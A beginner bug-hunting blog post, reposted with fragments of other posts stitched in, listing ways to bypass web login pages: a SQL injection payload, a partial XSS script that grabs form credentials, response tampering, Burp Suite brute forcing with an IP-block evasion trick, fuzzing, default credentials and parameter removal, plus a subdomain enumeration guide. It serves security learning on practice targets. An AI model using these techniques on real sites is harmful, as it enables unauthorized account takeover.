Discuss on Cloud, Best Practices on Cloud Deployments, Cloud implementations and options, administration understandings. How to approach Cloud, scale-up and on-premises deployments.Migrating workloads to major Cloud Services, Changes in architecture, security and policy settings, HA/DR option, monitoring options, support options, costing, and so on. Analyze all these in the blogs and discuss the pros and cons of Cloud,
Monday, March 17, 2025
Common Ways Hackers Bypass Web login - mistakes to avoid Hosted Web Services
Hellooo to all beginner bug hunting fellows. This is Uttam Gupta, today i came with an another blog on login page. This blog is about bypassing the login page functionality which happens due to the weaknesses of the site. There are many ways to bypass login page functionality but in this blog we are discussing about some common ways. So let’s start…..
We are talking about these seven ways —
Bypass by SQL Injection
By Cross Site Scripting(XSS)
By Manipulating the Response
Bypass by Brute Force Attack
Bypass by Directory Fuzzing Attack
Bypass by Default credentials
By Removing Parameter in Request
Bypass by SQL Injection
I am taking an example of Mutillidae for demonstration.
So now we can put the SQL injection payload in it. For this syntax error the payload is “ ‘ or 1=1- -” now let’s see what happen when enter it.
Boooom!! we are logged in as an admin. In your case try other payloads when it not working and also use SQLMap tool for dump the usernames and passwords.
By Cross Site Scripting(XSS)
Enter the xss payload <script>alert(1)</script> and it shows the popup, so you can try CSRF via XSS and see the victims credentials. This is the CSRF payload for it —
<script> function intercept() {
var user = document.forms[0].elements[0].value; var pass = document.forms[0].elements[1].value;
Read this blog for learn in detail about this method.
By Manipulating the Response
This method mainly based on Response Status code manipulation and Response Body manipulation. First of all make an account on your target then login with correct credentials and intercepts request in burp suite and analyze the response after that you try to login with wrong credentials and manipulate the response as you see it with your correct credentials like
If this weakness is exist you will be logged in on site.
Bypass by Brute Force Attack
This attack mainly occur when site does not set the time limit and repeating limit, basically does not set time delay function on login page. When you enter repeatedly wrong credentials and site show the time like enter credentials after 5 minutes. When site show this kind of error so it difficult to do this method. I have written a blog about brute force attack, its link is given below see it how to do this attack.
#1 How to perform Login Brute Force using Burp Suite.
First of all, intercept the login page request in Burp Suite. Then send the request in Intruder( ctrl + I ).
#2 Broken brute-force protection, IP block.
In this, we can see that after too many failed login attempts our IP gets blocked.
------
#1 How to perform Login Brute Force using Burp Suite.
nullFirst of all, intercept the login page request in Burp Suite. Then send the request in Intruder( ctrl + I ).
Clear all the positions. Now we will add the username and password positions one by one. And select the attack type as “ Cluster bomb”.
For Payload set 1, payload type: “Simple list”. And paste the usernames list.
For Payload set 2, payload type: “Simple list”. And paste the passwords list.
Finally, start attack and find larger value of length. If you are find this, yo can hit the target.
In this, we can see that after too many failed login attempts our IP gets blocked.
For testing this type of login mechanism, firstly create an account on the target site for correct credentials(like admin:12345).
The broken part of this brute force protection is that, if you log in with the correct username and password, the counter for blocking the logging restarts. So for example, I log in using admin:admin 2 times, the 3rd time I log in with admin:12345. Now I can try to log in with admin:admin for another 2 times without getting blocked.
Let’s select the pitchfork mode. Next, select the 2 parameters that we want to attack which is the username and password.
Now, create two lists, one for usernames and another for passwords. List of usernames and passwords alternating between your username:password and other invalid username:password.
For Payload set 1, payload type: “Simple list”. And paste the usernames list.
For Payload set 2, payload type: “Simple list”. And paste the passwords list.
Start attack, and find the status code similar to your credentials status code. And you will bypass it.
----
Bypass by Directory Fuzzing Attack
In this method, we try to do directory brute forcing with the help some tools like ffuf, dirbuster and burp suite intruder etc. Most of the tools have its own directory wordlist but when its not have wordlist so in linux it have own wordlist you use them for windows you can search on google.
In this attack may be possible, tool can find any directory or subdirectory which show useful response or open any page which only open when you logged in site. I have used the FFUF tool in this blog you can see how it works.
#8 Subdomain Enumeration — How to find Subdomains of any Domain
Hello, I have come today with a very useful topic of recon. In this blog we will see how to find Subdomain of any…
----
#8 Subdomain Enumeration —How to find Subdomains of any Domain
Hello, I have come today with a very useful topic of recon. In this blog we will see how to find Subdomain of any target. So, lets start.
What is Subdomain?
A subdomain is, as the name would suggest, an additional section of your main Domain name. You create subdomains to help organize and navigate to different sections of your main website. Within your main Domain, you can have as many subdomains as necessary to get to all of the different pages of your website.
What is Subdomain Enumeration?
It is one of the most crucial parts of the reconnaissance phase while performing a security assessment. Subdomain Enumeration is a process of finding sub-domains of one or more root domains.
Why we need Subdomain Enumeration?
Subdomain Enumeration helps to create a scope of security assessment by revealing Domains/Subdomains of a target organization. It increases the chance of finding vulnerabilities. And it helps us in finding the web applications that might be forgotten/left unattended by the organization for the maintenance or other reasons and may lead to the disclosure of critical vulnerabilities.
Methods of Subdomain Enumeration
By search engines
Search engines like Google supports various advanced search operators to refine search queries. These operators are often referred to as Google Dorks. We can use site: operator in Google search to find all the Subdomains that Google has found for a Domain. Lets take an example on “site:vulnweb.com”.
By online sites
These are some online sites who find the Subdomains of any Domain.
Enter your target domain and click on show Subdomain.
By Subfinder(in Kali machine)
Subfinder is a Subdomain discovery tool that discovers valid Subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed.
And will be installed. Now open new terminal and type this command
subfinder -d "your target domain"
I am taking “example.com”.
By Sublist3r(in Kali machine)
Sublister is a tool designed in python and uses OSINT in order to enumerate Subdomains of websites. It helps pen-testers in collecting and gathering Subdomains for a Domain which is their target.
And will be installed. Now open new terminal and type this command
sublist3r -d "your target domain"
I am taking “vulnweb.com”.
By Amass(in Kali machine)
This package contains a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques.
Installation Amass:- Open Kali Terminal and write these commands
sudo apt-get update sudo apt-get install amass
And will be installed. Write the Subdomain Enumeration command.
amass enum -d "your target domain"
I am again taking “vulnweb.com”.
Brute Force Subdomain By ffuf(in Kali machine)
ffuf is a fest web fuzzer written in Go that allows typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing.
Installation ffuf:- Open Kali Terminal and write this
git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build
And will be installed. In this method we are performing brute force, so we also need domain wordlist. You can download the Subdomain wordlist by Google and save wordlists folder. Now see an example on “vulnweb.com”
Command,
ffuf -w /path/to/wordlist -u https://FUZZ.target
-w means wordlist, -u means target URL and FUZZ is the part that has to be brute force.
Here are some methods to find subdomain, hope you will have learned something new that’s all for today. Thank you for reading. Be an #Ethical Hacker and stay safe.
----
Bypass by Default credentials
When the developer creates the site, he creates some default credentials for testing and many times it happens that he removes it or many times he does not remove it from the record. And when the site allows any password to be entered, many users can enter weak passwords and site accept it. So you should try the default credentials. Default credentials lists become easily available on Google. Default credentials like admin:admin, admin:password, username:pass12345 etc.
By Removing Parameter in Request
When you enter wrong credentials the site shows error like username and password is incorrect/does not match, password is incorrect for this username etc, this type of response is shown by the site so can try this method Huh. First you intercept the request and remove the password parameter in the request and forward the request. Then the server sees that the username is available and logs you in to the site. This problem occurs when the server does not analyze the request properly.
These are some ways hopefully you enjoy it and learn something new with this blog. So that’s it for today’s blog, see you in the next blog. Thank You For Reading.
No comments:
Post a Comment